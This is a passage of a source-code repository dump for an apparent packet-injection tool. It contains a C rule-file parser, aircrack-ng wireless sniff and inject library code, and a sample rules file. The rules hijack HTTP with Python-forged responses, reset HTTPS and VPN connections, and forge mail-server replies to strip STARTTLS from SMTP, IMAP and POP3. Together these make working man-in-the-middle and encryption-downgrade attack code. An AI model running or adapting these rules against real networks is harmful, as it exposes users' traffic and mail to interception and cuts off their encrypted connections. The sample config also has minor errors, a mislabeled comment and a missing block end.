to the file to load the response from 258 | if((fd = open(argument, O_RDONLY)) < 0) { 259 | printf("Error opening file: %s\n", argument); 260 | perror("open"); 261 | return NULL; 262 | } 263 | 264 | if(fstat(fd, &statbuf) < 0) { 265 | perror("stat"); 266 | return NULL; 267 | } 268 | 269 | if(statbuf.st_size > MATCHER_MAX_RESPONSE) { 270 | printf("Error: file %s is too large! (Maximum size is %u)\n", argument, MATCHER_MAX_RESPONSE); 271 | return NULL; 272 | } 273 | 274 | head->response = malloc(statbuf.st_size + 1); 275 | if(head->response == NULL) { 276 | perror("malloc"); 277 | return NULL; 278 | } 279 | 280 | while((c = read(fd, head->response + lenread, statbuf.st_size - lenread)) < statbuf.st_size) { 281 | lenread += c; 282 | printf("read %d bytes\n", lenread); 283 | } 284 | 285 | lenread += c; 286 | 287 | head->response_len = lenread; 288 | 289 | #ifdef HAVE_PYTHON 290 | } else if(strcmp(command, "pymodule") == 0) { 291 | if(!pyinitialized) { 292 | setenv("PYTHONPATH", PYTHONPATH, 1); 293 | Py_Initialize(); 294 | pyinitialized = 1; 295 | } 296 | PyObject *module = PyImport_Import(PyString_FromString(argument)); 297 | if(module == NULL) { 298 | PyErr_Print(); 299 | printf("Error loading module: %s\n", argument); 300 | return NULL; 301 | } 302 | 303 | head->pyfunc = PyObject_GetAttrString(module, PYFUNCNAME); 304 | if(head->pyfunc == NULL) { 305 | PyErr_Print(); 306 | printf("No function named '"PYFUNCNAME"' in module: %s\n", argument); 307 | return NULL; 308 | } 309 | #endif 310 | } else if(strcmp(command, "end") == 0) { 311 | // now's a good time to make sure the block had everything we care about.. 312 | if(head && !(head = check_block_params(head))) { 313 | return NULL; 314 | } 315 | } else { 316 | printf("Unknown command at line %u\n", line_no); 317 | return NULL; 318 | } 319 | } 320 | } 321 | return head; 322 | } 323 | -------------------------------------------------------------------------------- /matchers.conf.sample: -------------------------------------------------------------------------------- 1 | # Hijack HTTP on port 80, match GET or POST requests for "pornhub.com" and then call python module called http_pornhub for response generation 2 | begin http_80 3 | match ^(GET|POST).* 4 | ignore (^GET [^ ?]+\.(?i:jpg|jpeg|gif|png|ico|css)|(?i:host: .*pornhub.com)) 5 | dst_port 80 6 | proto tcp 7 | option reset 8 | pymodule http_pornhub 9 | end 10 | 11 | # Deny all HTTPS via sending fake response and RST packet after than 12 | begin ssl_443 13 | match (.) 14 | dst_port 443 15 | proto any 16 | option reset 17 | response content/no_ssl_please 18 | end 19 | 20 | # Deny OpenVPN via sending fake response and RST packet after than 21 | begin openvpn_1194 22 | match (.) 23 | dst_port 1194 24 | proto any 25 | option reset 26 | response content/no_ssl_please 27 | end 28 | 29 | # Deny PPTP via sending fake response and RST packet after than 30 | begin pptp_1723 31 | match (.) 32 | dst_port 1723 33 | proto any 34 | option reset 35 | response content/no_ssl_please 36 | end 37 | 38 | # Deny L2TP via sending fake response and RST packet after than 39 | begin l2tp_1701 40 | match (.) 41 | dst_port 1701 42 | proto any 43 | option reset 44 | response content/no_ssl_please 45 | end 46 | 47 | # Deny OpenVPN via sending fake response and RST packet after than 48 | begin smtp_587 49 | match (?i)ehlo 50 | dst_port 587 51 | proto tcp 52 | response content/smtp_no_starttls 53 | end 54 | 55 | # Send fake SMTP response from server, and trying to "deny" STARTTLS in smtp 56 | begin smtp_25 57 | match (?i)ehlo 58 | dst_port 25 59 | proto tcp 60 | response content/smtp_no_starttls 61 | end 62 | 63 | # Send fake SMTP response from server, and trying to "deny" STARTTLS in smtp 64 | begin smtp_2525 65 | match (?i)ehlo 66 | dst_port 2525 67 | proto tcp 68 | response content/smtp_no_starttls 69 | end 70 | 71 | # Send fake response on starttls command in SMTP 72 | begin smtp_587_stoptls 73 | match (?i)starttls 74 | dst_port 587 75 | proto tcp 76 | response content/smtp_stoptls 77 | end 78 | 79 | # Send fake response on starttls command in SMTP 80 | begin smtp_25_stoptls 81 | match (?i)starttls 82 | dst_port 25 83 | proto tcp 84 | response content/smtp_stoptls 85 | end 86 | 87 | # Send fake response on starttls command in SMTP 88 | begin smtp_2525_stoptls 89 | match (?i)starttls 90 | dst_port 2525 91 | proto tcp 92 | response content/smtp_stoptls 93 | end 94 | 95 | # Just reset all SSL SMTP connections 96 | begin smtp_465 97 | match (.) 98 | dst_port 465 99 | proto any 100 | option reset 101 | response content/no_ssl_please 102 | end 103 | 104 | begin imap_143 105 | match (?i)capability 106 | dst_port 143 107 | proto tcp 108 | response content/imap_no_starttls 109 | end 110 | 111 | begin imap_143_stoptls 112 | match (?i)starttls 113 | dst_port 143 114 | proto tcp 115 | response content/imap_stoptls 116 | 117 | begin imap_993 118 | match (.) 119 | dst_port 993 120 | proto any 121 | option reset 122 | response content/no_ssl_please 123 | end 124 | 125 | begin pop3_110_stoptls 126 | match (?i)stls 127 | dst_port 110 128 | proto tcp 129 | response content/pop3_stoptls 130 | end 131 | -------------------------------------------------------------------------------- /matchers.h: -------------------------------------------------------------------------------- 1 | #ifndef _MATCHERS_H__ 2 | #define _MATCHERS_H__ 3 | 4 | #include 5 | 6 | #define MATCHER_MAX_LEN 2048 7 | #define MATCHER_MAX_RESPONSE 32000 // maximum text response len 8 | #define MATCHERS_DEFAULT_FILENAME "matchers.conf" 9 | 10 | #ifdef HAVE_PYTHON 11 | 12 | #include 13 | #define PYFUNCNAME "forge_response" 14 | #define PYTHONPATH "./python" // python modules path 15 | 16 | #endif 17 | 18 | struct matcher_entry { 19 | char name[64]; 20 | pcre *match; 21 | pcre *ignore; 22 | u_char *response; 23 | u_int response_len; 24 | #ifdef HAVE_PYTHON 25 | PyObject *pyfunc; 26 | #endif 27 | u_int options; 28 | #define MATCHER_OPTION_RESET 1 29 | u_int proto; 30 | #define MATCHER_PROTO_ANY 1 31 | #define MATCHER_PROTO_UDP 2 32 | #define MATCHER_PROTO_TCP 3 33 | u_int src_port; 34 | u_int dst_port; 35 | struct matcher_entry *next; 36 | }; 37 | 38 | struct matcher_entry *parse_matchers_file(char *); 39 | struct matcher_entry *matchers_match(const char *, int, struct ctx *, u_int, u_int, u_int); 40 | struct matcher_entry *matchers_get_response(u_char *, u_int, struct ctx *, u_int, u_int, u_int); 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /osdep/Makefile: -------------------------------------------------------------------------------- 1 | AC_ROOT = ./ 2 | include $(AC_ROOT)/common.mak 3 | 4 | RTAP = radiotap 5 | 6 | LIB = libosdep.a 7 | CFLAGS += $(PIC) -I.. $(LIBAIRPCAP) 8 | 9 | OBJS_COMMON = network.o file.o 10 | OBJS = osdep.o $(OBJS_COMMON) 11 | 12 | #AIRPCAP_DIR = airpcap 13 | OBJS_APCAP = airpcap.o 14 | 15 | OBJS_OBSD = $(OBJS) openbsd.o openbsd_tap.o 16 | OBJS_NBSD = $(OBJS) netbsd.o netbsd_tap.o 17 | OBJS_FBSD = $(OBJS) freebsd.o freebsd_tap.o 18 | OBJS_LINUX = $(OBJS) linux.o linux_tap.o radiotap/radiotap.o common.o 19 | OBJS_DUMMY = $(OBJS) dummy.o dummy_tap.o 20 | OBJS_CYGWIN = $(OBJS) cygwin.o cygwin_tap.o radiotap/radiotap.o 21 | OBJS_DARWIN = $(OBJS) darwin.o darwin_tap.o radiotap/radiotap.o 22 | 23 | # XXX make it a DLL, without polluting cygwin.c 24 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(airpcap) $(AIRPCAP))),true) 25 | OBJS_CYGWIN += $(OBJS_APCAP) 26 | DOPCAP = $(AR) x $(AC_ROOT)/../developers/Airpcap_Devpack/lib/libairpcap.a 27 | else 28 | DOPCAP = 29 | endif 30 | 31 | all: 32 | @echo Building for $(OSNAME) 33 | @$(MAKE) .os.$(OSNAME) 34 | 35 | .os.dummy: $(OBJS_DUMMY) 36 | $(AR) cru $(LIB) $(OBJS_DUMMY) 37 | $(RANLIB) $(LIB) 38 | touch $(@) 39 | 40 | .os.DragonFly: $(OBJS_FBSD) 41 | $(AR) cru $(LIB) $(OBJS_FBSD) 42 | $(RANLIB) $(LIB) 43 | touch $(@) 44 | 45 | .os.FreeBSD: $(OBJS_FBSD) 46 | $(AR) cru $(LIB) $(OBJS_FBSD) 47 | $(RANLIB) $(LIB) 48 | touch $(@) 49 | 50 | .os.GNU-kFreeBSD: $(OBJS_FBSD) 51 | $(AR) cru $(LIB) $(OBJS_FBSD) 52 | $(RANLIB) $(LIB) 53 | touch $(@) 54 | 55 | .os.OpenBSD: $(OBJS_OBSD) 56 | $(AR) cru $(LIB) $(OBJS_OBSD) 57 | $(RANLIB) $(LIB) 58 | touch $(@) 59 | 60 | .os.NetBSD: $(OBJS_NBSD) 61 | $(AR) cru $(LIB) $(OBJS_NBSD) 62 | $(RANLIB) $(LIB) 63 | touch $(@) 64 | 65 | .os.Linux: $(OBJS_LINUX) 66 | $(AR) cru $(LIB) $(OBJS_LINUX) 67 | $(RANLIB) $(LIB) 68 | touch $(@) 69 | 70 | .os.cygwin: $(OBJS_CYGWIN) 71 | $(DOPCAP) 72 | $(AR) cru $(LIB) *.o radiotap/radiotap.o 73 | $(RANLIB) $(LIB) 74 | touch $(@) 75 | 76 | .os.Darwin: $(OBJS_DARWIN) 77 | $(DOPCAP) 78 | $(AR) cru $(LIB) $(OBJS_DARWIN) 79 | $(RANLIB) $(LIB) 80 | touch $(@) 81 | 82 | .os.%: .os.dummy 83 | @echo "Your platform is unsupported by osdep, dummy code compiled." 84 | touch $(@) 85 | 86 | install: all 87 | 88 | uninstall: 89 | 90 | clean: 91 | $(MAKE) -C $(RTAP) clean 92 | rm -f $(LIB) *.o .os.* 93 | -------------------------------------------------------------------------------- /osdep/OSDEP_CHANGES_FOR_LRC.txt: -------------------------------------------------------------------------------- 1 | * copied common.mak and pcap.h into osdep folder 2 | * replaced AC_ROOT to ./ in Makefile 3 | * changed REVISION in common.mak to lrc 4 | * removed stack protector gcc key(because of openwrt compile fail) 5 | -------------------------------------------------------------------------------- /osdep/airpcap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007-2017 Thomas d'Otreppe 3 | * 4 | * Airpcap stuff 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * 19 | * In addition, as a special exception, the copyright holders give 20 | * permission to link the code of portions of this program with the 21 | * OpenSSL library under certain conditions as described in each 22 | * individual source file, and distribute linked combinations 23 | * including the two. 24 | * You must obey the GNU General Public License in all respects 25 | * for all of the code used other than OpenSSL. If you modify 26 | * file(s) with this exception, you may extend this exception to your 27 | * version of the file(s), but you are not obligated to do so. If you 28 | * do not wish to do so, delete this exception statement from your 29 | * version. If you delete this exception statement from all source 30 | * files in the program, then also delete it here. 31 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 32 | */ 33 | #ifdef HAVE_AIRPCAP 34 | 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | #include "osdep.h" 43 | 44 | //------------------ PPI --------------------- 45 | #define PPH_PH_VERSION ((u_int8_t)0x00) 46 | #define PPI_FIELD_TYPE_802_11_COMMON ((u_int16_t)0x02) 47 | 48 | typedef struct _PPI_PACKET_HEADER 49 | { 50 | u_int8_t PphVersion; 51 | u_int8_t PphFlags; 52 | u_int16_t PphLength; 53 | u_int32_t PphDlt; 54 | } 55 | PPI_PACKET_HEADER, *PPPI_PACKET_HEADER; 56 | 57 | typedef struct _PPI_FIELD_HEADER 58 | { 59 | u_int16_t PfhType; 60 | u_int16_t PfhLength; 61 | } 62 | PPI_FIELD_HEADER, *PPPI_FIELD_HEADER; 63 | 64 | typedef struct _PPI_FIELD_802_11_COMMON 65 | { 66 | u_int64_t TsfTimer; 67 | u_int16_t Flags; 68 | u_int16_t Rate; 69 | u_int16_t ChannelFrequency; 70 | u_int16_t ChannelFlags; 71 | u_int8_t FhssHopset; 72 | u_int8_t FhssPattern; 73 | int8_t DbmAntSignal; 74 | int8_t DbmAntNoise; 75 | } 76 | PPI_FIELD_802_11_COMMON, *PPPI_FIELD_802_11_COMMON; 77 | 78 | 79 | #define DEVICE_PREFIX "\\\\.\\" 80 | #define DEVICE_COMMON_PART "airpcap" 81 | 82 | PAirpcapHandle airpcap_handle; 83 | 84 | /** 85 | * Check if the device is an Airpcap device 86 | * @param iface Interface name 87 | * @return 1 if it is an Airpcap device, 0 if not 88 | */ 89 | int isAirpcapDevice(const char * iface) 90 | { 91 | char * pos; 92 | int len; 93 | 94 | pos = strstr(iface, DEVICE_COMMON_PART); 95 | 96 | // Check if it contains "airpcap" 97 | if (! pos) 98 | return 0; 99 | 100 | if (pos != iface) 101 | { 102 | // Check if it begins with '\\.\' 103 | if (strstr(iface, AIRPCAP_DEVICE_NAME_PREFIX) != iface) 104 | return 0; 105 | } 106 | 107 | len = strlen(iface); 108 | 109 | // Checking that it contains 2 figures at the end. 110 | // No need to check for length, it was already done by the first check 111 | if (! (isdigit((int)iface[len - 1])) || !(isdigit((int)iface[len - 2]))) 112 | return 0; 113 | 114 | return 1; 115 | } 116 | 117 | /** 118 | * Parse information from a PPI packet (will be used later). 119 | * @param p packet 120 | * @param caplen Length of the packet 121 | * @param hdrlen Length of the header 122 | * @param power pointer that will contains the power of the packet 123 | * @return 0 if successful decoding, 1 if it failed to decode 124 | */ 125 | int ppi_decode(const u_char *p, int caplen, int *hdrlen, int *power) 126 | { 127 | PPPI_PACKET_HEADER pPpiPacketHeader; 128 | PPPI_FIELD_HEADER pFieldHeader; 129 | ULONG position = 0; 130 | 131 | // Sanity checks 132 | if (caplen < (int)sizeof(*pPpiPacketHeader)) 133 | { 134 | // Packet smaller than the PPI fixed header 135 | return( 1 ); 136 | } 137 | 138 | pPpiPacketHeader = (PPPI_PACKET_HEADER)p; 139 | 140 | *hdrlen = pPpiPacketHeader->PphLength; 141 | 142 | if(caplen < *hdrlen) 143 | { 144 | // Packet smaller than the PPI fixed header 145 | return( 1 ); 146 | } 147 | 148 | position = sizeof(*pPpiPacketHeader); 149 | 150 | if (pPpiPacketHeader->PphVersion != PPH_PH_VERSION) 151 | { 152 | fprintf( stderr, "Unknown PPI packet header version (%u)\n", pPpiPacketHeader->PphVersion); 153 | return( 1 ); 154 | } 155 | 156 | do 157 | { 158 | // now we suppose to have an 802.11-Common header 159 | if (*hdrlen < (int)(sizeof(*pFieldHeader) + position)) 160 | { 161 | break; 162 | } 163 | 164 | pFieldHeader = (PPPI_FIELD_HEADER)(p + position); 165 | position += sizeof(*pFieldHeader); 166 | 167 | switch(pFieldHeader->PfhType) 168 | { 169 | case PPI_FIELD_TYPE_802_11_COMMON: 170 | if (pFieldHeader->PfhLength != sizeof(PPI_FIELD_802_11_COMMON) || caplen - position < sizeof(PPI_FIELD_802_11_COMMON)) 171 | { 172 | // the header is bogus, just skip it 173 | fprintf( stderr, "Bogus 802.11-Common Field. Skipping it.\n"); 174 | } 175 | else 176 | { 177 | PPPI_FIELD_802_11_COMMON pField = (PPPI_FIELD_802_11_COMMON)(p + position); 178 | 179 | if (pField->DbmAntSignal != -128) 180 | { 181 | *power = (int)pField->DbmAntSignal; 182 | } 183 | else 184 | { 185 | *power = 0; 186 | } 187 | } 188 | break; 189 | 190 | default: 191 | // we do not know this field. Just print type and length and skip 192 | break; 193 | } 194 | 195 | position += pFieldHeader->PfhLength; 196 | } 197 | while(TRUE); 198 | 199 | return( 0 ); 200 | } 201 | 202 | /** 203 | * Set MAC Address of the device 204 | * @param mac MAC Address 205 | * @return 0 (successful) 206 | */ 207 | int airpcap_set_mac(void *mac) 208 | { 209 | if (mac) {} 210 | return 0; 211 | } 212 | 213 | /** 214 | * Close device 215 | */ 216 | void airpcap_close(void) 217 | { 218 | // By default, when plugged in, the adapter is set in monitor mode; 219 | // Application may assume it's already in monitor mode and forget to set it 220 | // So, do not remove monitor mode. 221 | if (airpcap_handle != NULL) 222 | { 223 | AirpcapClose(airpcap_handle); 224 | airpcap_handle = NULL; 225 | } 226 | } 227 | 228 | /** 229 | * Get MAC Address of the device (not yet implemented) 230 | * @param mac It will contain the mac address 231 | * @return 0 (successful) 232 | */ 233 | int airpcap_get_mac(void *mac) 234 | { 235 | // Don't use the function from Airpcap 236 | if (mac) {} 237 | 238 | return 0; 239 | } 240 | 241 | /** 242 | * Capture one packet 243 | * @param buf Buffer for the packet 244 | * @param len Length of the buffer 245 | * @param ri Receive information 246 | * @return -1 if failure or the number of bytes received 247 | */ 248 | int airpcap_sniff(void *buf, int len, struct rx_info *ri) 249 | { 250 | // Use PPI headers to obtain the different information for ri 251 | // Use AirpcapConvertFrequencyToChannel() to get channel 252 | // Add an option to give frequency instead of channel 253 | UINT BytesReceived = 0; 254 | 255 | if (ri) {} 256 | // Wait for the next packet 257 | // Maybe add an event packets to read 258 | // WaitForSingleObject(ReadEvent, INFINITE); 259 | 260 | // Read a packet 261 | if(AirpcapRead(airpcap_handle, buf, len, &BytesReceived)) 262 | return (int)BytesReceived; 263 | 264 | return -1; 265 | } 266 | 267 | /** 268 | * Inject one packet 269 | * @param buf Buffer for the packet 270 | * @param len Length of the buffer 271 | * @param ti Transmit information 272 | * @return -1 if failure or the number of bytes sent 273 | */ 274 | int airpcap_inject(void *buf, int len, struct tx_info *ti) 275 | { 276 | if (ti) {} 277 | if (AirpcapWrite (airpcap_handle, buf, len) != 1) 278 | return -1; 279 | 280 | return len; 281 | } 282 | 283 | /** 284 | * Print the error message 285 | * @param err Contains the error message and a %s in order to show the Airpcap error 286 | * @param retValue Value returned by the function 287 | * @return retValue 288 | */ 289 | int printErrorCloseAndReturn(const char * err, int retValue) 290 | { 291 | if (err && airpcap_handle) 292 | { 293 | if (strlen(err)) 294 | { 295 | if (airpcap_handle) 296 | fprintf( stderr, err, AirpcapGetLastError(airpcap_handle)); 297 | else 298 | fprintf( stderr, err); 299 | } 300 | } 301 | 302 | airpcap_close(); 303 | 304 | return retValue; 305 | } 306 | 307 | /** 308 | * Initialize the device 309 | * @param param Parameters for the initialization 310 | * @return 0 if successful, -1 in case of failure 311 | */ 312 | int airpcap_init(char *param) 313 | { 314 | // Later: if several interfaces are given, aggregate them. 315 | 316 | char * iface; 317 | char errbuf[AIRPCAP_ERRBUF_SIZE ]; 318 | 319 | iface = (char *)calloc(1, strlen(param) + 100); 320 | 321 | if (param) 322 | { 323 | // if it's empty, use the default adapter 324 | if (strlen(param) > 0) 325 | { 326 | if (strstr(param, DEVICE_PREFIX) == NULL) 327 | { 328 | // Not found, add it 329 | 330 | strcpy(iface, DEVICE_PREFIX); 331 | strcat(iface, param); 332 | } 333 | else 334 | { 335 | // Already contains the adapter header 336 | strcpy(iface, param); 337 | } 338 | } 339 | } 340 | 341 | airpcap_handle = AirpcapOpen(iface, errbuf); 342 | 343 | if(airpcap_handle == NULL) 344 | { 345 | fprintf( stderr, "This adapter doesn't have wireless extensions. Quitting\n"); 346 | //pcap_close( winpcap_adapter ); 347 | return( -1 ); 348 | } 349 | 350 | /* Tell the adapter that the packets we'll send and receive don't include the FCS */ 351 | if(!AirpcapSetFcsPresence(airpcap_handle, FALSE)) 352 | return printErrorCloseAndReturn("Error setting FCS presence: %s\n", -1); 353 | 354 | /* Set the link layer to bare 802.11 */ 355 | if(!AirpcapSetLinkType(airpcap_handle, AIRPCAP_LT_802_11)) 356 | return printErrorCloseAndReturn("Error setting the link type: %s\n", -1); 357 | 358 | /* Accept correct frames only */ 359 | if( !AirpcapSetFcsValidation(airpcap_handle, AIRPCAP_VT_ACCEPT_CORRECT_FRAMES) ) 360 | return printErrorCloseAndReturn("Error setting FCS validation: %s\n", -1); 361 | 362 | /* Set a low mintocopy for better responsiveness */ 363 | if(!AirpcapSetMinToCopy(airpcap_handle, 1)) 364 | return printErrorCloseAndReturn("Error setting MinToCopy: %s\n", -1); 365 | 366 | return 0; 367 | } 368 | 369 | /** 370 | * Set device channel 371 | * @param chan Channel 372 | * @return 0 if successful, -1 if it failed 373 | */ 374 | int airpcap_set_chan(int chan) 375 | { 376 | // Make sure a valid channel is given 377 | if (chan <= 0) 378 | return -1; 379 | 380 | if(!AirpcapSetDeviceChannel(airpcap_handle, chan)) 381 | { 382 | printf("Error setting the channel to %d: %s\n", chan, AirpcapGetLastError(airpcap_handle)); 383 | return -1; 384 | } 385 | 386 | return 0; 387 | } 388 | 389 | #endif 390 | -------------------------------------------------------------------------------- /osdep/airpcap.h: -------------------------------------------------------------------------------- 1 | // Function to be used by cygwin 2 | void airpcap_close(void); 3 | int airpcap_get_mac(void *mac); 4 | int airpcap_set_mac(void *mac); 5 | int airpcap_sniff(void *buf, int len, struct rx_info *ri); 6 | int airpcap_inject(void *buf, int len, struct tx_info *ti); 7 | int airpcap_init(char *param); 8 | int airpcap_set_chan(int chan); 9 | 10 | int isAirpcapDevice(const char * iface); 11 | 12 | 13 | //int printErrorCloseAndReturn(const char * err, int retValue); 14 | 15 | -------------------------------------------------------------------------------- /osdep/common.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2008-2017, Thomas d'Otreppe 3 | * 4 | * Common OSdep stuff 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | #include 21 | #include 22 | #include "common.h" 23 | 24 | /** 25 | * Return the frequency in Mhz from a channel number 26 | */ 27 | int getFrequencyFromChannel(int channel) 28 | { 29 | static int frequencies[] = { 30 | -1, // No channel 0 31 | 2412, 2417, 2422, 2427, 2432, 2437, 2442, 2447, 2452, 2457, 2462, 2467, 2472, 2484, 32 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // Nothing from channel 15 to 34 (exclusive) 33 | 5170, 5175, 5180, 5185, 5190, 5195, 5200, 5205, 5210, 5215, 5220, 5225, 5230, 5235, 5240, 5245, 34 | 5250, 5255, 5260, 5265, 5270, 5275, 5280, 5285, 5290, 5295, 5300, 5305, 5310, 5315, 5320, 5325, 35 | 5330, 5335, 5340, 5345, 5350, 5355, 5360, 5365, 5370, 5375, 5380, 5385, 5390, 5395, 5400, 5405, 36 | 5410, 5415, 5420, 5425, 5430, 5435, 5440, 5445, 5450, 5455, 5460, 5465, 5470, 5475, 5480, 5485, 37 | 5490, 5495, 5500, 5505, 5510, 5515, 5520, 5525, 5530, 5535, 5540, 5545, 5550, 5555, 5560, 5565, 38 | 5570, 5575, 5580, 5585, 5590, 5595, 5600, 5605, 5610, 5615, 5620, 5625, 5630, 5635, 5640, 5645, 39 | 5650, 5655, 5660, 5665, 5670, 5675, 5680, 5685, 5690, 5695, 5700, 5705, 5710, 5715, 5720, 5725, 40 | 5730, 5735, 5740, 5745, 5750, 5755, 5760, 5765, 5770, 5775, 5780, 5785, 5790, 5795, 5800, 5805, 41 | 5810, 5815, 5820, 5825, 5830, 5835, 5840, 5845, 5850, 5855, 5860, 5865, 5870, 5875, 5880, 5885, 42 | 5890, 5895, 5900, 5905, 5910, 5915, 5920, 5925, 5930, 5935, 5940, 5945, 5950, 5955, 5960, 5965, 43 | 5970, 5975, 5980, 5985, 5990, 5995, 6000, 6005, 6010, 6015, 6020, 6025, 6030, 6035, 6040, 6045, 44 | 6050, 6055, 6060, 6065, 6070, 6075, 6080, 6085, 6090, 6095, 6100 45 | }; 46 | 47 | return (channel > 0 && channel <= HIGHEST_CHANNEL) ? frequencies[channel] : (channel >= LOWEST_CHANNEL && channel <= -4) ? 5000 - (channel * 5) : -1 ; 48 | } 49 | 50 | /** 51 | * Return the channel from the frequency (in Mhz) 52 | */ 53 | int getChannelFromFrequency(int frequency) 54 | { 55 | if (frequency >= 2412 && frequency <= 2472) 56 | return (frequency - 2407) / 5; 57 | else if (frequency == 2484) 58 | return 14; 59 | 60 | else if (frequency >= 4920 && frequency <= 6100) 61 | return (frequency - 5000) / 5; 62 | else 63 | return -1; 64 | } 65 | -------------------------------------------------------------------------------- /osdep/common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * (c) 2010-2017 Thomas d'Otreppe 3 | * 4 | * This program is free software; you can redistribute it and/or 5 | * modify it under the terms of the GNU General Public License as 6 | * published by the Free Software Foundation; either version 2 of the 7 | * License, or (at your option) any later version. 8 | * 9 | * This program is distributed in the hope that it will be useful, but 10 | * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied 11 | * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and 12 | * NON-INFRINGEMENT. See the GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program; if not, write to the Free Software 16 | * Foundation, Inc., 59 Temple Place - Suite 330, Boston, 17 | * MA 02111-1307, USA. 18 | * 19 | * In addition, as a special exception, the copyright holders give 20 | * permission to link the code of portions of this program with the 21 | * OpenSSL library under certain conditions as described in each 22 | * individual source file, and distribute linked combinations 23 | * including the two. 24 | * You must obey the GNU General Public License in all respects 25 | * for all of the code used other than OpenSSL. If you modify 26 | * file(s) with this exception, you may extend this exception to your 27 | * version of the file(s), but you are not obligated to do so. If you 28 | * do not wish to do so, delete this exception statement from your 29 | * version. If you delete this exception statement from all source 30 | * files in the program, then also delete it here. 31 | */ 32 | #ifndef _OSDEP_COMMON_H_ 33 | #define _OSDEP_COMMON_H_ 34 | 35 | int getFrequencyFromChannel(int channel); 36 | int getChannelFromFrequency(int frequency); 37 | 38 | /* 39 | // For later use, because aircrack-ng doesn't compile with MS compilers 40 | #if defined(WIN32) || defined(__WIN__) 41 | #define ftruncate(a, b) _chsize(a,b) 42 | #endif 43 | */ 44 | 45 | #define HIGHEST_CHANNEL 221 46 | #define LOWEST_CHANNEL -16 47 | 48 | #endif 49 | -------------------------------------------------------------------------------- /osdep/common.mak: -------------------------------------------------------------------------------- 1 | PKG_CONFIG ?= pkg-config 2 | 3 | NEWSSE = true 4 | # Newer version of the core can be enabled via SIMDCORE 5 | # but should be automatically flipped on thru autodetection 6 | SIMDCORE = false 7 | 8 | # Multibin will compile a separate binary for each core: original, SSE and SIMD. 9 | MULTIBIN = false 10 | 11 | ifndef TOOL_PREFIX 12 | TOOL_PREFIX = 13 | endif 14 | ifndef OSNAME 15 | OSNAME := $(shell uname -s | sed -e 's/.*CYGWIN.*/cygwin/g' -e 's,/,-,g') 16 | endif 17 | ifndef SQLITE 18 | SQLITE = false 19 | endif 20 | 21 | ifndef LIBAIRPCAP 22 | LIBAIRPCAP = 23 | endif 24 | 25 | ifeq ($(OSNAME), cygwin) 26 | EXE = .exe 27 | PIC = 28 | SQLITE = false 29 | else 30 | EXE = 31 | ifeq ($(OSNAME), SunOS) 32 | PIC = 33 | LDFLAGS += -lsocket -lnsl 34 | else 35 | PIC = -fPIC 36 | endif 37 | ifndef SQLITE 38 | SQLITE = true 39 | endif 40 | endif 41 | 42 | COMMON_CFLAGS = 43 | OSX_ALT_FLAGS = 44 | 45 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(xcode) $(XCODE))),true) 46 | COMMON_CFLAGS += -I/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdk/MacOSX.sdk/usr/include/ -D_XCODE -I../.. 47 | OSX_ALT_FLAGS = true 48 | endif 49 | 50 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(macport) $(MACPORT))),true) 51 | COMMON_CFLAGS += -I/opt/local/include -I../.. 52 | LDFLAGS += -L/opt/local/lib 53 | OSX_ALT_FLAGS = true 54 | endif 55 | 56 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(sqlite) $(SQLITE))),true) 57 | COMMON_CFLAGS += -DHAVE_SQLITE 58 | endif 59 | 60 | ifeq ($(pcre), true) 61 | PCRE = true 62 | endif 63 | 64 | ifeq ($(PCRE), true) 65 | COMMON_CFLAGS += $(shell $(PKG_CONFIG) --cflags libpcre) -DHAVE_PCRE 66 | endif 67 | 68 | STACK_PROTECTOR = true 69 | ifeq ($(stackprotector), false) 70 | STACK_PROTECTOR = false 71 | endif 72 | 73 | ifeq ($(STACKPROTECTOR), false) 74 | STACK_PROTECTOR = false 75 | endif 76 | 77 | ifeq ($(OSNAME), cygwin) 78 | COMMON_CFLAGS += -DCYGWIN 79 | endif 80 | 81 | ifeq ($(OSNAME), Linux) 82 | ifneq ($(libnl), false) 83 | NL3xFOUND := $(shell $(PKG_CONFIG) --atleast-version=3.2 libnl-3.0 && echo Y) 84 | ifneq ($(NL3xFOUND),Y) 85 | NL31FOUND := $(shell $(PKG_CONFIG) --exact-version=3.1 libnl-3.1 && echo Y) 86 | ifneq ($(NL31FOUND),Y) 87 | NL3FOUND := $(shell $(PKG_CONFIG) --atleast-version=3 libnl-3.0 && echo Y) 88 | endif 89 | ifneq ($(NL3FOUND),Y) 90 | NL1FOUND := $(shell $(PKG_CONFIG) --atleast-version=1 libnl-1 && echo Y) 91 | endif 92 | ifneq ($(NL1FOUND),Y) 93 | NLTFOUND := $(shell $(PKG_CONFIG) --atleast-version=1 